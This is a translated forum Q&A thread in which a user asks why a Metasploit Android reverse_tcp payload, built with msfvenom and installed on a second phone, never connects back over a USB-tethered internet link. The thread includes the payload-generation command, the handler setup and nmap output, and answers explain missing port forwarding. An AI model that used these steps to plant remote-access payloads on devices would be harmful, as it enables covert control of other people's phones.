Como estabelecer corretamente uma conexão com um host remoto sem roteador?

0

Primeiro de tudo, este é meu primeiro post, então, por favor, não ignore isso. Você pode ter visto essa pergunta antes. Antes de marcar isso como duplicado, por favor, entenda meus problemas. Eu tenho muitos problemas. Estou usando isso para fins educacionais.

observe o seguinte:

  1. Eu não tenho um roteador.
  2. Eu instalei o Kali 2.0 (sana).
  3. Eu uso meu celular Android para se conectar à INTERNET via tethering USB.

Agora, vou explicar o que aconteceu.

primeiro de tudo o que criei uma carga útil Android

msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.net LPORT=4444 -o test1.apk

xxx.xxx.net é meu DNS não registrado no IP (oculto com x); então eu assinei com sucesso.

Agora, enviei-o para outro dispositivo Android via Bluetooth (para que o endereço IP do meu dispositivo não seja alterado no processo. Ele também não está conectado à LAN) então eu instalei com sucesso.

ifconfig:

# ifconfig
eth0      Link encap:Ethernet  HWaddr 78:24:af:bc:a8:a2  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:1072 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1072 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:87360 (85.3 KiB)  TX bytes:87360 (85.3 KiB)

usb0      Link encap:Ethernet  HWaddr 42:c8:eb:7b:43:a9  
          inet addr:192.168.42.50  Bcast:192.168.42.255  Mask:255.255.255.0
          inet6 addr: fe80::40c8:ebff:fe7b:43a9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:20535 errors:21 dropped:0 overruns:0 frame:21
          TX packets:23085 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:11073420 (10.5 MiB)  TX bytes:3833297 (3.6 MiB)

então eu abri o terminal.

# msfconsole


 _____________

msf > use exploit/multi/handler
msf exploit(handler) 
set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler)
set lhost 192.168.42.50
lhost => 192.168.42.50
msf exploit(handler) 
set lport 4444
lport => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.42.50:4444 
[*] Starting the payload handler...

Depois de abrir o aplicativo no celular de destino, nada é recebido no terminal de metasploit.

No entanto, o mesmo funciona bem em LAN. mas quando se trata de Internet falha. Eu tentei quase tudo que posso fazer, mas em vão.

Descobri que as portas estão abertas no endereço IP local.

# nmap 192.168.42.50

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-03-27 22:53 IST
Nmap scan report for kali (192.168.42.50)
Host is up (0.0000070s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
4444/tcp open  krb524

Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds

mas eles estão fechados no DNS não-ip registrado.

# nmap xxx.xxx.net

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-03-27 22:55 IST
Nmap scan report for xxx.xxx.net (a.b.c.d)
Host is up (0.22s latency).

rDNS record for a.b.c.d: static-a-b-c-d.ctrls.in

Not shown: 990 closed ports

PORT     STATE    SERVICE

21/tcp   filtered ftp
53/tcp   filtered domain
80/tcp   open     http
111/tcp  open     rpcbind
443/tcp  open     https
445/tcp  filtered microsoft-ds
554/tcp  filtered rtsp
1723/tcp filtered pptp
3306/tcp open     mysql
8022/tcp open     oa-system

Nmap done: 1 IP address (1 host up) scanned in 144.05 seconds

nota: a.b.c.d é o endereço IP resolvido do meu DNS

Então, como exatamente posso estabelecer uma conexão bem-sucedida?

Se você acha que, de qualquer maneira, essa questão está fora do tópico ou algo mais, por favor, sugira-me uma solução de alguma forma.

    
por Joe_Vj _95 27.03.2016 / 19:35

2 respostas

0

Você tem um roteador - seu telefone. Seu telefone rotas entre 192.168. endereços e endereços da Internet. O problema é que você não tem porta encaminhada no seu telefone. É provável que seja possível, mas não será fácil. Você provavelmente precisará de acesso root e usar o iptables. Nesse ponto, você provavelmente vai querer perguntar no android.se, onde você provavelmente terá uma resposta melhor.

Nota: isso parece um problema XY. Qual é o propósito disso? Provavelmente, existe uma maneira melhor de fazer o que você quer.

    
por 28.03.2016 / 22:43
0

ok, deixe-me dar um giro em responder isso, mas primeiro vou re-declarar o que eu acho que você está tentando alcançar, para ter certeza de que eu não estou entendendo mal as coisas.

Você tem um sistema com o Kali linux, que recebe acesso à Internet através de um telefone celular com cabo USB que fornece um endereço RFC1918 (ou seja, não roteado pela Internet) de 192.168.42.50.

Você está configurando um shell reverso do Android usando metasploit, especificando seu endereço roteável pela Internet

Em seguida, use exploit / multi / handler para escutar na porta 4444 em seu endereço local não-roteável.

O problema é que, embora você possa ver sua porta ouvindo na LAN local, não é possível vê-la de um dispositivo conectado à Internet quando a carga é entregue.

A varredura de porta no endereço roteável pela Internet não mostra portas abertas.

-

Assumindo que tudo está correto, o problema é que você não configurou o "encaminhamento de porta" do endereço da Internet para sua instância local do metasploit.

A maneira como isso geralmente seria feito, onde você tem o controle do dispositivo que tem o endereço de Internet em uma de suas interfaces, você avisa para encaminhar a porta 4444 / TCP dessa interface para o seu sistema interno em 192.168.42.50 .

Se você puder configurar isso, o que você está descrevendo deve funcionar. Se você não tiver acesso para criar um "encaminhamento de porta", o que você está descrevendo não funcionará, pois o alvo que está executando o exploit na Internet não tem nada com o qual se conectar.

    
por 28.03.2016 / 22:33